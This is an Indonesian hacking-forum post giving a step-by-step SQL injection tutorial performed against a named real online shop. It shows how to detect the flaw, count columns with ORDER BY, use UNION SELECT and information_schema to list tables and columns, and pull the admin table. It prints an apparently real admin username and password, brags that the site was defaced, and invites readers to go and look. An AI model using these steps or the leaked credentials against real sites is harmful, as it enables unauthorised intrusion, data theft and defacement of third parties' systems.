login first please !!!
Pencarian
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» hacking depfreeze / beruang putih
Sun Feb 26, 2012 8:04 pm by kobe

» salam kenal
Mon Oct 31, 2011 11:19 am by kobe

» Avacs Live chat
Sun Oct 16, 2011 3:18 am by sikancil83

» deface lagi...deface.. lagi... bosen...
Sat Sep 24, 2011 4:30 pm by areg_noid

» wew.... muantaff gan
Sat Sep 24, 2011 4:25 pm by areg_noid

» link kgb archver
Sun Jul 24, 2011 5:22 pm by areg_noid

» be carefully !! virus on the linux.
Wed Apr 20, 2011 9:28 pm by areg_noid

» Tugas akhir Network Simulator-2
Fri Mar 25, 2011 2:01 am by mr.onang

» iseng om dengan SQL Injection ^_^
Sat Feb 26, 2011 5:59 pm by areg_noid


iseng om dengan SQL Injection ^_^

Topik sebelumnya Topik selanjutnya Go down

iseng om dengan SQL Injection ^_^

Post  areg_noid on Sat Feb 26, 2011 5:59 pm

oke om.. langsung saja

====[1]====
saia dapet taget [You must be registered and logged in to see this link.]

====[2]====
biar tau target tsb bisadi injek ato ga kita tambah kan karakter ' (koma atas) di depan tanda =ato stelah angka, misal jadinya [You must be registered and logged in to see this link.]

jika muncul pesan eror seperti "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/nowtees.com/httpdocs/cat.php on line 14"

maka targetdapat di inject

====[3]====
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

bgini om:
[You must be registered and logged in to see this link.]

lalu cek terus om
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]

sampe
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]

sampek muncul pesan error...
misal:
[You must be registered and logged in to see this link.]
muncul "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/nowtees.com/httpdocs/cat.php on line 14"

nah, berarti yang kita ambil angka 26 Razz

====[4]====
untuk mengeluarkan angka ajaib (istilah gaul.e om Laughing ) berapa yang muncul gunakan perintah union
karena tadi error sampai angka 27
gunakan perintah : +and+1=2+union+select+

sehingga sampe 26 saja, liat:
[You must be registered and logged in to see this link.]

taraa... muncul angka 3 Razz Razz
lalu coba injek pada angka tsb dengan perntah
version() utk untuk mengecek versi sql yg dipakai
user() untuk mengetahui nama user
database() untuk mengetahui nama database

kita coba menggunakan perintah version() untk melihat versi sql web target

liat:
[You must be registered and logged in to see this link.]

yes, muncul 5.0.51a-3ubuntu5.8 (versi 5)
jika versi 4.x.x.xx tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah +from+information_schema
untuk versi 5.x.x.xx berarti anda beruntung tidak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah +from+information_schema

====[5]====
Untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) ---> dimasukan pada angka yg keluar tadi dan
perintah +from+information_schema.tables+where+table_schema=database()---> dimasukan setelah angka terakhir

liat:
[You must be registered and logged in to see this link.]

muncul ini
admin,cart,categories,class,corporate_sale,countries,customers,customorder,flash,gifting_cards,gifting_config,gifting_winner, bla...bla....bla....

kita cari table yang kira kira berisi username dan password web tersebut
misal.e user, usr, username, user_name, login, user_admin, name, admin_user, dll...

dn kebetulan pada web target kita itu terdapat table dengan nama "admin" Razz

kita ubah dulu nama table yang mau di liat isi tablenya dengan tool ini [You must be registered and logged in to see this link.]
dan hasil dari konvert kata admin yaitu 61:64:6d:69:6e
hilangkan tanda titik duanya menjadi 61646d696e

====[6]====
Mencari isi table

Perintah : group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah : +from+information_schema.columns+where+table_name=0xhexa-- ===> dimasukkan diangka terakhir

ganti hexa dengan kata admin yg sudah di convert ke hexa


liat:
[You must be registered and logged in to see this link.]

dan muncul isi table tsb adalah

id,userName,password,status


====[7]====

untuk melihat isi dari column userName,password
gunakan perintah : concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah: +from+(nama table berasal) -> dimasukan setelah angka terakhir
NB : 0x3a adalah tanda : (titik dua)

liat:
[You must be registered and logged in to see this link.]

tereeeng muncul deh username ama passwordnya Razz Razz

56hgYTOI7%&j@:7YyYtk%n0@h&Di (username dan password dibatasi tanda titik dua)

====[8]====
langkah terakhir adalah mencari halaman login admin web tersebut,
om bisa menggunakan tools admin finder pada tahap ini

NB : kadang kadang, ada username dan pasword yang encrypt. maka om bisa menggunakan tools juga

====[selesai]====

ini luh om scrinchotnya, yang belum di erbaiki setalah ane eksekusi, nama ane masi ada Razz

[You must be registered and logged in to see this image.]

[You must be registered and logged in to see this image.]

dan ini

[You must be registered and logged in to see this image.]

oh iya cek TKP aja lansung om di [You must be registered and logged in to see this link.] munkin aemasi belum di perbaiki


monggo nyoba,semoga tutorial ini berguna untuk pembelajaran. penulis tidak bertanggung jawab atas kerusakan yang anda perbuat Razz Razz

areg_noid

Jumlah posting : 22
Join date : 16.12.10
Age : 24
Lokasi : Sidoarjo

Lihat profil user

Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik